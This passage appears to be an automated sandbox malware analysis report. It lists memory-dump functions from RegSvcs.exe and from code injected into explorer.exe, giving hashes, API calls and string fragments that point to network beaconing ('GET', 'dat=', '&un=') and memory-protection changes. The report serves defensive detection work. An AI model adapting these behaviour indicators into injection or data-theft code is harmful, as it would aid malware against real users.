                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                            • Instruction ID: e81c3a24030f68cf81371ceece07b1f7b3ca9dd0f84db3bd52dc55015acb0704
                                            • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                            • Instruction Fuzzy Hash: 3BE09231051651DFE7326F2EC848B52BAE5BF50B12F148C2CA19E424F0C7759DC1DA41
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                            • Instruction ID: 4a76d3d78dc925c233afe1c9e4f202c0df19ab5c19b63cf59249f3906d839e67
                                            • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                            • Instruction Fuzzy Hash: 16E0AE343002058BE755CF1AC044B627BA6BFD6B10F28C078A9488F205EB32A9428A40
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 809a2e628f88572af1226956f202b1efcaa5c2d9b4f759fe49f19a96f65bfdfa
                                            • Instruction ID: 524aa147dd48ff081a0707201e509533c43b346d61abf177f1a5ea88d7d72532
                                            • Opcode Fuzzy Hash: 809a2e628f88572af1226956f202b1efcaa5c2d9b4f759fe49f19a96f65bfdfa
                                            • Instruction Fuzzy Hash: 8690023160550406D10071584954746100997D1301F65D411A1429578DC7958B596AA3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d20969f2f34960f8fa1c76623e348aee613b52686794904b3fb0d6d285841fc1
                                            • Instruction ID: 03fb01c8d083812bdd08ced3b476842ff8550d0684e31d92c961884c174d83ad
                                            • Opcode Fuzzy Hash: d20969f2f34960f8fa1c76623e348aee613b52686794904b3fb0d6d285841fc1
                                            • Instruction Fuzzy Hash: 3290022124545106D150715C48446564009B7E1301F55D021A18195A4DC5558A5D6722
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b37f364ca163028ba253ab1d22f038758803670b358deb205e62f1d62352a661
                                            • Instruction ID: 3a8e21d84fdf1755b4dec124c85d9216e3c16341bd75099d64a15e78b608c61b
                                            • Opcode Fuzzy Hash: b37f364ca163028ba253ab1d22f038758803670b358deb205e62f1d62352a661
                                            • Instruction Fuzzy Hash: 5390023120240146954072585C44A8E410997E2302B95E415A101A564CC9148A695722
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5cc6a4510069606777bcf91a2d633b1669fd70434116aa00c35ac2bce67951ab
                                            • Instruction ID: 1ce540b83ec17c33dd2d196772abd6e623911758becf7e635d104e992c14fad8
                                            • Opcode Fuzzy Hash: 5cc6a4510069606777bcf91a2d633b1669fd70434116aa00c35ac2bce67951ab
                                            • Instruction Fuzzy Hash: 5F90023520140406D51071585C44686004A97D1301F55E411A1429568DC6548AA9A622
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: 495660c6c6ebb40cda5277ddaf59ab26478b30a0221369676ecf7f655a56e0dd
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 4a32caf65a3db453b981b226abc97aea5978002fcff4fb4f17607b8c7e2b913d
                                            • Instruction ID: 405ee2b63be1e87b99eaef81be36d9ad88f1dac0735e08896355a61e03d99192
                                            • Opcode Fuzzy Hash: 4a32caf65a3db453b981b226abc97aea5978002fcff4fb4f17607b8c7e2b913d
                                            • Instruction Fuzzy Hash: E851F9B2A0021ABFDB25DB9C89D097EFBB9BB48740B948229F495D7641D334DF0087E0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 59e87a61eb011a6e1281cd7d3359bc124b418f3f77e41ab29b1dd28dbb22841a
                                            • Instruction ID: 85f3fb51820a1b5a50e0cc5f3b2a7220a4ebc6063d379fe2a95485a3a8fa7039
                                            • Opcode Fuzzy Hash: 59e87a61eb011a6e1281cd7d3359bc124b418f3f77e41ab29b1dd28dbb22841a
                                            • Instruction Fuzzy Hash: 97512A71A006496ECB30EF5CC9D087FB7FCEB44301B648869F59AD7685E674DA808760
                                            Strings
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 018D4742
                                            • ExecuteOptions, xrefs: 018D46A0
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018D46FC
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 018D4655
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 018D4787
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 018D4725
                                            • Execute=1, xrefs: 018D4713
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: e574790721ea0dbc361ba05222f98e1319ad9ffc8d9ff3a8e79e129f4d1ec3dd
                                            • Instruction ID: 672e325399dc7e4e60828f12a082a32e844e3b8c2cf5da90e6cdca7e4f7c3457
                                            • Opcode Fuzzy Hash: e574790721ea0dbc361ba05222f98e1319ad9ffc8d9ff3a8e79e129f4d1ec3dd
                                            • Instruction Fuzzy Hash: 3251093165021D7BEF21AFA8DC89FAD77A8AF55304F0800A9D605EB181EB70AB45CF95
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                            • Instruction ID: 1721bffa8efdf50dd4375f19d2e5350467a27ee6312f35f41590b77e5e074cc3
                                            • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                            • Instruction Fuzzy Hash: 78021671508342AFD319CF18C494A6BBBF9EFC8700F54892DFA998B254DB31EA05CB52
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction ID: 3b5e5b8a5e5c4832d1f5056523aa9ef1fc3ed7699cd2bc86bae7de93d48bcdca
                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction Fuzzy Hash: CD81AF70E052499FFF298E6CC8917FEBFB1AF45360F984219D861E7291C7749A40CB51
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$[$]:%u
                                            • API String ID: 48624451-2819853543
                                            • Opcode ID: b857b117e89db5b7dc6a2dd863d5ab5e285adf1dcf5d46506b0794b26016388a
                                            • Instruction ID: ad5e58f75c554b30c5e7a9618ea15bd7f6ff8762533bc1d7881886703d0900a9
                                            • Opcode Fuzzy Hash: b857b117e89db5b7dc6a2dd863d5ab5e285adf1dcf5d46506b0794b26016388a
                                            • Instruction Fuzzy Hash: 3F214F7AA0011DABDB11EF69C840AEEBBFDEF54754F580126E909E3204E730DA418BA1
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 018D031E
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018D02E7
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018D02BD
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 3aea30c28acdaaa878c568356c621fe7c82970f05415f022188b928b6445fc89
                                            • Instruction ID: 3b45dea7df11fddf30f3819c062f054df513c34675e45dda47f8d9c59d0cc6e6
                                            • Opcode Fuzzy Hash: 3aea30c28acdaaa878c568356c621fe7c82970f05415f022188b928b6445fc89
                                            • Instruction Fuzzy Hash: E5E18C306087429FE725EF2CC884B2ABBE0BB85318F140A5DF6A5CB2D1D774DA45CB52
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 018D7BAC
                                            • RTL: Resource at %p, xrefs: 018D7B8E
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 018D7B7F
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: cf74e81820845e573b8a1d2074f7d1feced16db1120b2f08a8066888cd67b14d
                                            • Instruction ID: 414991d08dccdf6cbbcd1bdd8a0a42e348d372938281198ce2f5ddb56376c209
                                            • Opcode Fuzzy Hash: cf74e81820845e573b8a1d2074f7d1feced16db1120b2f08a8066888cd67b14d
                                            • Instruction Fuzzy Hash: 924104313007069FDB20DE29D840F6AB7E5EF89714F140A1DFA5ADB780DB71EA058B91
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018D728C
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 018D72C1
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 018D7294
                                            • RTL: Resource at %p, xrefs: 018D72A3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: be0e6ca860be2148885babd6cf124c434543861580e76c2b1cee43e286543ad9
                                            • Instruction ID: 57be1ebb26e989b460472533eee0e708e4eb18a5e7b9830f888afb4b745bf629
                                            • Opcode Fuzzy Hash: be0e6ca860be2148885babd6cf124c434543861580e76c2b1cee43e286543ad9
                                            • Instruction Fuzzy Hash: B5411131700346ABDB21DE29CC81F6AB7A5FF95718F140619FA56EB240DB31FA428BD1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: c4bb41950e83d5ef92e719e0ba6fa357ff93f6320842bf954dc9e15d0cb5587e
                                            • Instruction ID: 57d9816d619ef909ceb83edff5f3d2c2647594135042fae8198bdd361d9d11c3
                                            • Opcode Fuzzy Hash: c4bb41950e83d5ef92e719e0ba6fa357ff93f6320842bf954dc9e15d0cb5587e
                                            • Instruction Fuzzy Hash: 44317372A002199FDB20DF2DCC40BEEB7B8EB54751F940555E949E3244EB30AA458BA1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction ID: d3f2071d455bc2b0fa9422c931d90c9982220fcece1d1d376b2a8de536508cbb
                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction Fuzzy Hash: 5391C571E0020A9BFF24DF6DC8806BEBBB5AF44720F94451AEA55E72C4E7728B409761
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 36f474deb1c9c282b4d2f9cd221f0a94258abc5044f7f57fbfe66fc818f720c4
                                            • Instruction ID: 52043a69ad0d5edee13e60bd6cc29fda7bf025da813aa1335014c7a95a6ec065
                                            • Opcode Fuzzy Hash: 36f474deb1c9c282b4d2f9cd221f0a94258abc5044f7f57fbfe66fc818f720c4
                                            • Instruction Fuzzy Hash: 67810B71D00269DBDB25DB58CC44BEAB7B8AB48714F0041DAEA19F7280D7309F85CF61
                                            APIs
                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 018ECFBD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: CallFilterFunc@8
                                            • String ID: @$@4Cw@4Cw
                                            • API String ID: 4062629308-3101775584
                                            • Opcode ID: 931399416f48912549ea00024453760fa6a4e56add185580874ec6276ccd91d5
                                            • Instruction ID: 2507c04d562dcbdda05d1fb84761473ab54084bd2f2e30c60206b8345d6c1035
                                            • Opcode Fuzzy Hash: 931399416f48912549ea00024453760fa6a4e56add185580874ec6276ccd91d5
                                            • Instruction Fuzzy Hash: DD41AE71900219DFDB21DFA9C844AAEBBF8FF95B40F04412AE905EB254E770DA05CB62

                                            Execution Graph

                                            Execution Coverage: 1.2%
                                            Dynamic/Decrypted Code Coverage: 0%
                                            Signature Coverage: 11.4%
                                            Total number of Nodes: 79
                                            Total number of Limit Nodes: 9

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: getaddrinforecvsetsockopt
                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                            • API String ID: 1564272048-1117930895
                                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                            • Instruction ID: d55c51278006004f01d95d5ea2325851a5ae3e100d93a0b36261f1dd33ab7c5f
                                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                            • Instruction Fuzzy Hash: 99529F30614A888BC759EF68C4C47D9B7E1FB58304F51866ED49FCB242EE78B946CB81

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: `
                                            • API String ID: 823142352-2679148245
                                            • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                            • Instruction ID: 65f4400a4669143ffd6e827b13eca951cd1d4f87b01fc057d00751fa83bfe13c
                                            • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                            • Instruction Fuzzy Hash: 34225A70B18A499FCB89DF28C4956EAF7E1FB98305F41422EE55ED3250DF34A851CB82

                                            Control-flow Graph

                                            APIs
                                            • NtProtectVirtualMemory.NTDLL ref: 10475E67
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                            • Instruction ID: 094b9b26a3db708152c448631b6692a56f4e1381df72b872cfd1b8d8f8746bd6
                                            • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                            • Instruction Fuzzy Hash: 9D019E34628B884F8788EF6CD48116AB7E4FBD9214F000B3EE99AC7250EB74C5414782

                                            Control-flow Graph

                                            APIs
                                            • NtProtectVirtualMemory.NTDLL ref: 10475E67
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                            • Instruction ID: 91c0e68993bfe8efd9ab70558c0d38e277866c38d54469b49d296a38bd4c8daa
                                            • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                            • Instruction Fuzzy Hash: 3401A274628B884B8788EB3C94412A6B3E5FBCE314F004B3EE99AC3240EB75D5024782

                                            Control-flow Graph

                                            APIs
                                            • ObtainUserAgentString.URLMON ref: 1046F9A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: AgentObtainStringUser
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 2681117516-319646191
                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction ID: f5fb7636cb22381c6f896226f98d8766de0bde04856b0b86b7a123956680d3ba
                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction Fuzzy Hash: 7531B171614A4C8BCB44EFA8C8857EEB7E1FB58218F40422EE45ED7240EF789645C789

                                            Control-flow Graph

                                            APIs
                                            • ObtainUserAgentString.URLMON ref: 1046F9A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: AgentObtainStringUser
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 2681117516-319646191
                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction ID: cb59b9165acd548f2b649eafbed4f30264b5cf6ba6de121877e568bb3b501a50
                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction Fuzzy Hash: 6C21A571614A4C8BCB45DFA8C8857EE7BF1FF58248F40821EE45AD7240EF789645C789

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID: .dll$el32$kern
                                            • API String ID: 1964310414-1222553051
                                            • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                            • Instruction ID: 9d04357d84a0f163ac5fb7b8f225fe65751b7aba1d24e59805be98e2dd12cab9
                                            • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                            • Instruction Fuzzy Hash: 6F416A74918A088FDB84EFA8C4D57ED77E1FB58304F00416ED84ADB255EE349A85CB85

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID: .dll$el32$kern
                                            • API String ID: 1964310414-1222553051
                                            • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                            • Instruction ID: b8da2c92fdfd93f7573d4afba636ef75b1d991ad9384e900bcebf239f857a701
                                            • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                            • Instruction Fuzzy Hash: D7413A74918A088FDB84EFA8C4D9BED77E1FF68304F00416ED84ADB255EE349A45CB85

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                            • Instruction ID: 572f36df4ae5fdacba30605cd85dd731d97ca9201bb870cb9f396751611ca6f7
                                            • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                            • Instruction Fuzzy Hash: D1015E70618B188FCB84EF1CE088B55B7E0FB58314F1545AEE90DCB226CB74D8818BC2

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                            • Instruction ID: a1760b20c6be13a20fab86fb875a5ff2114651940ca7003a99e77d12983eb61f
                                            • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                            • Instruction Fuzzy Hash: 76012C70618A1C8FCB88EF5CE089B55B7E0FB59314F1541AEA90DCB226CB74C9818BC2

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID: send
                                            • API String ID: 2809346765-2809346765
                                            • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                            • Instruction ID: b57a9e4ab0b21d9ad098effbd362a7b9ba15710a00f7c416418d8f724d1575f9
                                            • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                            • Instruction Fuzzy Hash: 44015270518A088FCB88DF1CD088B6577E0EB58314F1645AED85DCB266CA70D8818B81

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
